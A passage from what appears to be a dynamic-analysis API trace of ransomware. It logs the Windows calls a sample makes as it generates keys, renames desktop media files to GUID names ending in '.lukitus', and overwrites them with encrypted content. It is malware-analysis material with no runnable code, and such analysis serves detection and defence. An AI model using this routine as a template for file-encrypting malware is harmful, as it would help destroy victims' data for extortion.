pbBuffer=0x281f594) returned 1 [0108.731] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.731] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.731] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.732] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.732] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\1E2KN90cFWYD.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\1e2kn90cfwyd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.732] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\1E2KN90cFWYD.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\1e2kn90cfwyd.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-C35B48E2-8851B50EB3F0.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-c35b48e2-8851b50eb3f0.lukitus"), dwFlags=0x9) returned 1 [0108.733] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.733] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.738] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x12d41, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x12d41, lpOverlapped=0x0) returned 1 [0108.739] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.739] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x12d41, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x12d41, lpOverlapped=0x0) returned 1 [0108.739] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.739] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64d5e110, dwHighDateTime=0x1d31760)) [0108.739] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.740] FlushFileBuffers (hFile=0x328) returned 1 [0108.743] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\aMCimEHovpv.wav" (normalized: "c:\\users\\aetadzjz\\desktop\\amcimehovpv.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x21042ab0, ftCreationTime.dwHighDateTime=0x1d2fb12, ftLastAccessTime.dwLowDateTime=0xf14112e0, ftLastAccessTime.dwHighDateTime=0x1d2fe9d, ftLastWriteTime.dwLowDateTime=0xf14112e0, ftLastWriteTime.dwHighDateTime=0x1d2fe9d, nFileSizeHigh=0x0, nFileSizeLow=0x13636)) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.743] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.743] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\aMCimEHovpv.wav" (normalized: "c:\\users\\aetadzjz\\desktop\\amcimehovpv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.743] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\aMCimEHovpv.wav" (normalized: "c:\\users\\aetadzjz\\desktop\\amcimehovpv.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-A9F24C29-70CE3C53B5EF.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-a9f24c29-70ce3c53b5ef.lukitus"), dwFlags=0x9) returned 1 [0108.745] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.745] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.750] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x13636, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x13636, lpOverlapped=0x0) returned 1 [0108.750] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.751] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x13636, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x13636, lpOverlapped=0x0) returned 1 [0108.751] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.751] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64d84270, dwHighDateTime=0x1d31760)) [0108.751] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.751] FlushFileBuffers (hFile=0x328) returned 1 [0108.755] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\DeN-pBWXL-QGo4Re.flv" (normalized: "c:\\users\\aetadzjz\\desktop\\den-pbwxl-qgo4re.flv"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5f3c930, ftCreationTime.dwHighDateTime=0x1d2ff11, ftLastAccessTime.dwLowDateTime=0x7e98b4e0, ftLastAccessTime.dwHighDateTime=0x1d3038f, ftLastWriteTime.dwLowDateTime=0x7e98b4e0, ftLastWriteTime.dwHighDateTime=0x1d3038f, nFileSizeHigh=0x0, nFileSizeLow=0x55f6)) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.755] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\DeN-pBWXL-QGo4Re.flv" (normalized: "c:\\users\\aetadzjz\\desktop\\den-pbwxl-qgo4re.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.755] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\DeN-pBWXL-QGo4Re.flv" (normalized: "c:\\users\\aetadzjz\\desktop\\den-pbwxl-qgo4re.flv"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-FB222AB3-C8884D7041DC.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-fb222ab3-c8884d7041dc.lukitus"), dwFlags=0x9) returned 1 [0108.757] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.757] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.763] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x55f6, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x55f6, lpOverlapped=0x0) returned 1 [0108.764] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.764] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x55f6, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x55f6, lpOverlapped=0x0) returned 1 [0108.764] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.764] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64daa3d0, dwHighDateTime=0x1d31760)) [0108.764] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.764] FlushFileBuffers (hFile=0x328) returned 1 [0108.767] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\i97TREDet3.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\i97tredet3.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf3181d0, ftCreationTime.dwHighDateTime=0x1d303a9, ftLastAccessTime.dwLowDateTime=0xd6a5df90, ftLastAccessTime.dwHighDateTime=0x1d2f78d, ftLastWriteTime.dwLowDateTime=0xd6a5df90, ftLastWriteTime.dwHighDateTime=0x1d2f78d, nFileSizeHigh=0x0, nFileSizeLow=0x98f6)) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.768] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.768] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\i97TREDet3.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\i97tredet3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.768] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\i97TREDet3.mp3" (normalized: "c:\\users\\aetadzjz\\desktop\\i97tredet3.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-1D408981-C958DFF9603C.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-1d408981-c958dff9603c.lukitus"), dwFlags=0x9) returned 1 [0108.770] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.770] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.774] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x98f6, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x98f6, lpOverlapped=0x0) returned 1 [0108.775] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.775] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x98f6, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x98f6, lpOverlapped=0x0) returned 1 [0108.775] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.775] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64dd0530, dwHighDateTime=0x1d31760)) [0108.776] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.776] FlushFileBuffers (hFile=0x328) returned 1 [0108.779] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\IIJa.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\iija.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x101fc3d0, ftCreationTime.dwHighDateTime=0x1d2f99b, ftLastAccessTime.dwLowDateTime=0x8fadc900, ftLastAccessTime.dwHighDateTime=0x1d2f76e, ftLastWriteTime.dwLowDateTime=0x8fadc900, ftLastWriteTime.dwHighDateTime=0x1d2f76e, nFileSizeHigh=0x0, nFileSizeLow=0xd237)) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.779] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\IIJa.m4a" (normalized: "c:\\users\\aetadzjz\\desktop\\iija.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.780] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\IIJa.m4a" (normalized: 